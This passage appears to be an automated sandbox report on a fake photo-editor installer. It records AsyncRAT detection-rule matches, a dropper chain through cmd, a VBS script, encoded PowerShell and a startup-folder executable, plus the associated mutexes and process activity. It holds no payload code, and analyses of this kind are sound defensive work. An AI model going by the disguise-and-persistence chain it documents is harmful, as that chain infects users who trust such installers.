                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeCode function: 0_2_001FE9E00_2_001FE9E0
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeCode function: 0_2_00206BC00_2_00206BC0
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeCode function: 0_2_001E6D400_2_001E6D40
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeCode function: 0_2_00376DE00_2_00376DE0
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeCode function: 0_2_003C2E500_2_003C2E50
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeCode function: 0_2_00318F200_2_00318F20
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeCode function: 0_2_001DCF900_2_001DCF90
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeCode function: 0_2_001D2F800_2_001D2F80
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeCode function: 0_2_002F0FB00_2_002F0FB0
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeCode function: 0_2_003F32900_2_003F3290
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeCode function: 0_2_0031F3600_2_0031F360
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeCode function: 0_2_001B33E00_2_001B33E0
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeCode function: 0_2_001F16900_2_001F1690
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeCode function: 0_2_004059990_2_00405999
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeCode function: 0_2_003C9A600_2_003C9A60
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeCode function: 0_2_00377BF00_2_00377BF0
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeCode function: 0_2_003FFC800_2_003FFC80
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeCode function: 0_2_0036DCF00_2_0036DCF0
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeCode function: 0_2_001E1E300_2_001E1E30
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeCode function: 0_2_001F9F000_2_001F9F00
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeCode function: 0_2_003FFFE00_2_003FFFE0
                  Source: C:\Program Files (x86)\PhotoPosPro4_SetUp.exeCode function: 6_2_0041C0376_2_0041C037
                  Source: C:\Program Files (x86)\PhotoPosPro4_SetUp.exeCode function: 6_2_004055086_2_00405508
                  Source: C:\Program Files (x86)\PhotoPosPro4_SetUp.exeCode function: 6_2_00429E166_2_00429E16
                  Source: C:\Program Files (x86)\PhotoPosPro4_SetUp.exeCode function: 6_2_00406AEB6_2_00406AEB
                  Source: C:\Windows\Installer\MSID82B.tmpCode function: 8_2_00007FF71B746FA08_2_00007FF71B746FA0
                  Source: C:\Windows\Installer\MSID82B.tmpCode function: 8_2_00007FF71B773CE88_2_00007FF71B773CE8
                  Source: C:\Windows\Installer\MSID82B.tmpCode function: 8_2_00007FF71B783C4C8_2_00007FF71B783C4C
                  Source: C:\Windows\Installer\MSID82B.tmpCode function: 8_2_00007FF71B774C808_2_00007FF71B774C80
                  Source: C:\Windows\Installer\MSID82B.tmpCode function: 8_2_00007FF71B795BC08_2_00007FF71B795BC0
                  Source: C:\Windows\Installer\MSID82B.tmpCode function: 8_2_00007FF71B757BC08_2_00007FF71B757BC0
                  Source: C:\Windows\Installer\MSID82B.tmpCode function: 8_2_00007FF71B767C088_2_00007FF71B767C08
                  Source: C:\Windows\Installer\MSID82B.tmpCode function: 8_2_00007FF71B775B308_2_00007FF71B775B30
                  Source: C:\Windows\Installer\MSID82B.tmpCode function: 8_2_00007FF71B793AE48_2_00007FF71B793AE4
                  Source: C:\Windows\Installer\MSID82B.tmpCode function: 8_2_00007FF71B791A4C8_2_00007FF71B791A4C
                  Source: C:\Windows\Installer\MSID82B.tmpCode function: 8_2_00007FF71B785A708_2_00007FF71B785A70
                  Source: C:\Windows\Installer\MSID82B.tmpCode function: 8_2_00007FF71B75E9FC8_2_00007FF71B75E9FC
                  Source: C:\Windows\Installer\MSID82B.tmpCode function: 8_2_00007FF71B78E9588_2_00007FF71B78E958
                  Source: C:\Windows\Installer\MSID82B.tmpCode function: 8_2_00007FF71B7660E48_2_00007FF71B7660E4
                  Source: C:\Windows\Installer\MSID82B.tmpCode function: 8_2_00007FF71B76F0E08_2_00007FF71B76F0E0
                  Source: C:\Windows\Installer\MSID82B.tmpCode function: 8_2_00007FF71B7531008_2_00007FF71B753100
                  Source: C:\Windows\Installer\MSID82B.tmpCode function: 8_2_00007FF71B77F01C8_2_00007FF71B77F01C
                  Source: C:\Windows\Installer\MSID82B.tmpCode function: 8_2_00007FF71B78C0348_2_00007FF71B78C034
                  Source: C:\Windows\Installer\MSID82B.tmpCode function: 8_2_00007FF71B76DFC08_2_00007FF71B76DFC0
                  Source: C:\Windows\Installer\MSID82B.tmpCode function: 8_2_00007FF71B76A0008_2_00007FF71B76A000
                  Source: C:\Windows\Installer\MSID82B.tmpCode function: 8_2_00007FF71B791F308_2_00007FF71B791F30
                  Source: C:\Windows\Installer\MSID82B.tmpCode function: 8_2_00007FF71B789F848_2_00007FF71B789F84
                  Source: C:\Windows\Installer\MSID82B.tmpCode function: 8_2_00007FF71B75DF888_2_00007FF71B75DF88
                  Source: C:\Windows\Installer\MSID82B.tmpCode function: 8_2_00007FF71B780F088_2_00007FF71B780F08
                  Source: C:\Windows\Installer\MSID82B.tmpCode function: 8_2_00007FF71B77EE188_2_00007FF71B77EE18
                  Source: C:\Windows\Installer\MSID82B.tmpCode function: 8_2_00007FF71B745E408_2_00007FF71B745E40
                  Source: C:\Windows\Installer\MSID82B.tmpCode function: 8_2_00007FF71B788DE48_2_00007FF71B788DE4
                  Source: C:\Windows\Installer\MSID82B.tmpCode function: 8_2_00007FF71B78EDF08_2_00007FF71B78EDF0
                  Source: C:\Windows\Installer\MSID82B.tmpCode function: 8_2_00007FF71B78CDF48_2_00007FF71B78CDF4
                  Source: C:\Windows\Installer\MSID82B.tmpCode function: 8_2_00007FF71B76AE108_2_00007FF71B76AE10
                  Source: C:\Windows\Installer\MSID82B.tmpCode function: 8_2_00007FF71B766D888_2_00007FF71B766D88
                  Source: C:\Windows\Installer\MSID82B.tmpCode function: 8_2_00007FF71B77F42C8_2_00007FF71B77F42C
                  Source: C:\Windows\Installer\MSID82B.tmpCode function: 8_2_00007FF71B78F4688_2_00007FF71B78F468
                  Source: C:\Windows\Installer\MSID82B.tmpCode function: 8_2_00007FF71B7533BC8_2_00007FF71B7533BC
                  Source: C:\Windows\Installer\MSID82B.tmpCode function: 8_2_00007FF71B76340C8_2_00007FF71B76340C
                  Source: C:\Windows\Installer\MSID82B.tmpCode function: 8_2_00007FF71B7723248_2_00007FF71B772324
                  Source: C:\Windows\Installer\MSID82B.tmpCode function: 8_2_00007FF71B76833C8_2_00007FF71B76833C
                  Source: C:\Windows\Installer\MSID82B.tmpCode function: 8_2_00007FF71B7813788_2_00007FF71B781378
                  Source: C:\Windows\Installer\MSID82B.tmpCode function: 8_2_00007FF71B7932B08_2_00007FF71B7932B0
                  Source: C:\Windows\Installer\MSID82B.tmpCode function: 8_2_00007FF71B7922E08_2_00007FF71B7922E0
                  Source: C:\Windows\Installer\MSID82B.tmpCode function: 8_2_00007FF71B77F2288_2_00007FF71B77F228
                  Source: C:\Windows\Installer\MSID82B.tmpCode function: 8_2_00007FF71B74D1B08_2_00007FF71B74D1B0
                  Source: C:\Windows\Installer\MSID82B.tmpCode function: 8_2_00007FF71B7481E08_2_00007FF71B7481E0
                  Source: C:\Windows\Installer\MSID82B.tmpCode function: 8_2_00007FF71B7971208_2_00007FF71B797120
                  Source: C:\Windows\Installer\MSID82B.tmpCode function: 8_2_00007FF71B75B1388_2_00007FF71B75B138
                  Source: C:\Windows\Installer\MSID82B.tmpCode function: 8_2_00007FF71B7548D48_2_00007FF71B7548D4
                  Source: C:\Windows\Installer\MSID82B.tmpCode function: 8_2_00007FF71B77F83C8_2_00007FF71B77F83C
                  Source: C:\Windows\Installer\MSID82B.tmpCode function: 8_2_00007FF71B75C8608_2_00007FF71B75C860
                  Source: C:\Windows\Installer\MSID82B.tmpCode function: 8_2_00007FF71B7467B08_2_00007FF71B7467B0
                  Source: C:\Windows\Installer\MSID82B.tmpCode function: 8_2_00007FF71B7917CC8_2_00007FF71B7917CC
                  Source: C:\Windows\Installer\MSID82B.tmpCode function: 8_2_00007FF71B7837148_2_00007FF71B783714
                  Source: C:\Windows\Installer\MSID82B.tmpCode function: 8_2_00007FF71B77F6388_2_00007FF71B77F638
                  Source: C:\Windows\Installer\MSID82B.tmpCode function: 8_2_00007FF71B78A6608_2_00007FF71B78A660
                  Source: C:\Windows\Installer\MSID82B.tmpCode function: 8_2_00007FF71B75A66C8_2_00007FF71B75A66C
                  Source: C:\Windows\Installer\MSID82B.tmpCode function: 8_2_00007FF71B7985A08_2_00007FF71B7985A0
                  Source: C:\Windows\Installer\MSID82B.tmpCode function: 8_2_00007FF71B78759C8_2_00007FF71B78759C
                  Source: C:\Windows\Installer\MSID82B.tmpCode function: 8_2_00007FF71B7885C88_2_00007FF71B7885C8
                  Source: C:\Windows\Installer\MSID82B.tmpCode function: 8_2_00007FF71B7645EC8_2_00007FF71B7645EC
                  Source: C:\Windows\Installer\MSID82B.tmpCode function: 8_2_00007FF71B7565E78_2_00007FF71B7565E7
                  Source: C:\Windows\Installer\MSID82B.tmpCode function: 8_2_00007FF71B7735538_2_00007FF71B773553
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeCode function: 14_2_0041C03714_2_0041C037
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeCode function: 14_2_0040550814_2_00405508
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeCode function: 14_2_00429E1614_2_00429E16
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeCode function: 14_2_00406AEB14_2_00406AEB
                  Source: C:\Program Files (x86)\PhotoPosPro4_SetUp.exeCode function: String function: 0041F62D appears 46 times
                  Source: C:\Program Files (x86)\PhotoPosPro4_SetUp.exeCode function: String function: 00428830 appears 49 times
                  Source: C:\Program Files (x86)\PhotoPosPro4_SetUp.exeCode function: String function: 0041F20D appears 31 times
                  Source: C:\Program Files (x86)\PhotoPosPro4_SetUp.exeCode function: String function: 0041FDD7 appears 40 times
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeCode function: String function: 0041F62D appears 46 times
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeCode function: String function: 00428830 appears 49 times
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeCode function: String function: 0041F20D appears 31 times
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeCode function: String function: 0041FDD7 appears 40 times
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeCode function: String function: 001C3440 appears 38 times
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeCode function: String function: 001BADE0 appears 65 times
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeCode function: String function: 001BA210 appears 31 times
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeCode function: String function: 001B8720 appears 54 times
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeCode function: String function: 001BA7A0 appears 57 times
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeCode function: String function: 001B9240 appears 121 times
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeCode function: String function: 00307010 appears 32 times
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeCode function: String function: 003E1904 appears 40 times
                  Source: PhotoPosPro4_SetUp.exeBinary or memory string: OriginalFilename vs PhotoPosPro4_SetUp.exe
                  Source: PhotoPosPro4_SetUp.exeBinary or memory string: OriginalFileName vs PhotoPosPro4_SetUp.exe
                  Source: PhotoPosPro4_SetUp.exe, 00000000.00000002.1872480343.0000000000543000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFileNamesetup.exe< vs PhotoPosPro4_SetUp.exe
                  Source: PhotoPosPro4_SetUp.exe, 00000000.00000003.1808811408.000000000AFEF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamePrereq.dllF vs PhotoPosPro4_SetUp.exe
                  Source: PhotoPosPro4_SetUp.exe, 00000000.00000003.1709301896.0000000009AFE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameXmlCfg.dllF vs PhotoPosPro4_SetUp.exe
                  Source: PhotoPosPro4_SetUp.exe, 00000000.00000003.1709301896.0000000009AFE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameviewer.exeF vs PhotoPosPro4_SetUp.exe
                  Source: PhotoPosPro4_SetUp.exe, 00000000.00000003.1709301896.0000000009AFE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelzmaextractor.dllF vs PhotoPosPro4_SetUp.exe
                  Source: PhotoPosPro4_SetUp.exe, 00000000.00000003.1709301896.0000000009AFE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameAICustAct.dllF vs PhotoPosPro4_SetUp.exe
                  Source: PhotoPosPro4_SetUp.exe, 00000000.00000003.1709301896.0000000009AFE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamePrereq.dllF vs PhotoPosPro4_SetUp.exe
                  Source: PhotoPosPro4_SetUp.exe, 00000000.00000003.1717614800.0000000009AF8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamewininet.dllD vs PhotoPosPro4_SetUp.exe
                  Source: PhotoPosPro4_SetUp.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                  Source: 41.2.MSBuild.exe.800000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
                  Source: 41.2.MSBuild.exe.800000.0.unpack, type: UNPACKEDPEMatched rule: rat_win_asyncrat author = Sekoia.io, description = Detect AsyncRAT based on specific strings, creation_date = 2023-01-25, classification = TLP:CLEAR, version = 1.0, id = d698e4a1-77ff-4cd7-acb3-27fb16168ceb
                  Source: 41.2.MSBuild.exe.800000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                  Source: 40.2.smcdll.exe.2c73d54.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
                  Source: 40.2.smcdll.exe.2c73d54.0.raw.unpack, type: UNPACKEDPEMatched rule: rat_win_asyncrat author = Sekoia.io, description = Detect AsyncRAT based on specific strings, creation_date = 2023-01-25, classification = TLP:CLEAR, version = 1.0, id = d698e4a1-77ff-4cd7-acb3-27fb16168ceb
                  Source: 40.2.smcdll.exe.2c73d54.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                  Source: 33.2.ebghls.exe.353b338.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
                  Source: 33.2.ebghls.exe.353b338.0.unpack, type: UNPACKEDPEMatched rule: rat_win_asyncrat author = Sekoia.io, description = Detect AsyncRAT based on specific strings, creation_date = 2023-01-25, classification = TLP:CLEAR, version = 1.0, id = d698e4a1-77ff-4cd7-acb3-27fb16168ceb
                  Source: 33.2.ebghls.exe.353b338.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                  Source: 40.2.smcdll.exe.2c73d54.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
                  Source: 40.2.smcdll.exe.2c73d54.0.unpack, type: UNPACKEDPEMatched rule: rat_win_asyncrat author = Sekoia.io, description = Detect AsyncRAT based on specific strings, creation_date = 2023-01-25, classification = TLP:CLEAR, version = 1.0, id = d698e4a1-77ff-4cd7-acb3-27fb16168ceb
                  Source: 40.2.smcdll.exe.2c73d54.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                  Source: 33.2.ebghls.exe.353b338.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
                  Source: 33.2.ebghls.exe.353b338.0.raw.unpack, type: UNPACKEDPEMatched rule: rat_win_asyncrat author = Sekoia.io, description = Detect AsyncRAT based on specific strings, creation_date = 2023-01-25, classification = TLP:CLEAR, version = 1.0, id = d698e4a1-77ff-4cd7-acb3-27fb16168ceb
                  Source: 33.2.ebghls.exe.353b338.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                  Source: 00000021.00000002.2602950947.0000000003411000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
                  Source: 00000021.00000002.2602950947.0000000003411000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                  Source: 00000021.00000002.2602950947.00000000035C8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                  Source: 00000029.00000002.2632261020.0000000000802000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                  Source: 00000028.00000002.2600796732.0000000002CB3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                  Source: 00000028.00000002.2600796732.0000000002B51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
                  Source: 00000028.00000002.2600796732.0000000002B51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                  Source: Process Memory Space: powershell.exe PID: 7924, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                  Source: Process Memory Space: ebghls.exe PID: 7312, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                  Source: Process Memory Space: smcdll.exe PID: 5328, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                  Source: IEvolution2.dll.14.dr, IEImage.csSuspicious method names: .IEImage.InjectJpegEXIF
                  Source: IEvolution2.dll.14.dr, IEImage.csSuspicious method names: .IEImage.InjectJpegIPTC
                  Source: IEvolution2.dll.14.dr, IEImage.csSuspicious method names: .IEImage.InjectTIFFEXIF
                  Source: IEvolution2.dll.14.dr, TImageEnViewContainer.csSuspicious method names: .TImageEnViewContainer.TImageEnIOInjectTIFFEXIF2
                  Source: IEvolution2.dll.14.dr, TImageEnViewContainer.csSuspicious method names: .TImageEnViewContainer.TImageEnIOInjectTIFFEXIF1
                  Source: IEvolution2.dll.14.dr, TImageEnViewContainer.csSuspicious method names: .TImageEnViewContainer.TImageEnViewIOInjectJpegIPTC
                  Source: IEvolution2.dll.14.dr, TImageEnViewContainer.csSuspicious method names: .TImageEnViewContainer.TImageEnViewIOInjectJpegEXIF
                  Source: powershell.exe, 00000014.00000002.1936217038.000001F10A3E0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ;.VBp
                  Source: PhotoPosPro_PreInstaller.exe, 00000019.00000002.2106250664.0000000005DE0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: The Monotype Corporation plc. 1992. All Rights Reserved.slnt
                  Source: classification engineClassification label: mal100.troj.adwa.spyw.expl.evad.winEXE@83/1047@79/30
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeCode function: 0_2_00318020 FormatMessageW,GetLastError,0_2_00318020
                  Source: C:\Program Files (x86)\PhotoPosPro4_SetUp.exeCode function: 6_2_00413C08 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,6_2_00413C08
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeCode function: 14_2_00413C08 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,14_2_00413C08
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeCode function: 0_2_0034BEA0 GetDiskFreeSpaceExW,0_2_0034BEA0
                  Source: C:\Windows\Installer\MSID82B.tmpCode function: 8_2_00007FF71B745A80 CreateToolhelp32Snapshot,CloseHandle,Process32FirstW,OpenProcess,LocalFree,LocalFree,CloseHandle,Process32NextW,CloseHandle,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,8_2_00007FF71B745A80
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeCode function: 0_2_00364D10 CoCreateInstance,0_2_00364D10
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeCode function: 0_2_001BA660 LoadResource,LockResource,SizeofResource,0_2_001BA660
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Photo Pos ProJump to behavior
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeFile created: C:\Users\user\AppData\Roaming\Photo Pos ProJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMutant created: NULL
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutant created: \Sessions\1\BaseNamedObjects\b07a471d77cfe06cdec2d3542b45b8ea
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMutant created: \Sessions\1\BaseNamedObjects\AsyncMutex_7SI8OkPne
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7516:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8136:120:WilError_03
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeMutant created: \Sessions\1\BaseNamedObjects\Photo Pos Pro 4_inst_m
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7932:120:WilError_03
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeFile created: C:\Users\user\AppData\Local\Temp\shiA856.tmpJump to behavior
                  Source: C:\Windows\Installer\MSID82B.tmpProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C ""C:\Program Files (x86)\cmd.bat" "
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wscript.exe wscript.exe "C:\Users\Public\18.vbs"
                  Source: PhotoPosPro4_SetUp.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LS.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Family,VirtualizationFirmwareEnabled FROM Win32_Processor
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeFile read: C:\Users\desktop.iniJump to behavior
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: C:\Program Files (x86)\PhotoPosPro4_SetUp.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganizationJump to behavior
                  Source: PhotoPosPro4_SetUp.exeVirustotal: Detection: 9%
                  Source: PhotoPosPro4_SetUp.exeString found in binary or memory: The %s installation couldn't be found. Try re-installing the application before running the update.
                  Source: PhotoPosPro4_SetUp.exeString found in binary or memory: The installation was not removed. Do you still want to re-install?
                  Source: PhotoPosPro4_SetUp.exeString found in binary or memory: %s is already installed on your system. It is highly recommended to uninstall the application before re-installing. Do you want to uninstall %s before re-installing?
                  Source: PhotoPosPro4_SetUp.exe_tmp.exeString found in binary or memory: The %s installation couldn't be found. Try re-installing the application before running the update.
                  Source: PhotoPosPro4_SetUp.exe_tmp.exeString found in binary or memory: The installation was not removed. Do you still want to re-install?
                  Source: PhotoPosPro4_SetUp.exe_tmp.exeString found in binary or memory: %s is already installed on your system. It is highly recommended to uninstall the application before re-installing. Do you want to uninstall %s before re-installing?
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeFile read: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeJump to behavior
                  Source: unknownProcess created: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exe "C:\Users\user\Desktop\PhotoPosPro4_SetUp.exe"
                  Source: unknownProcess created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
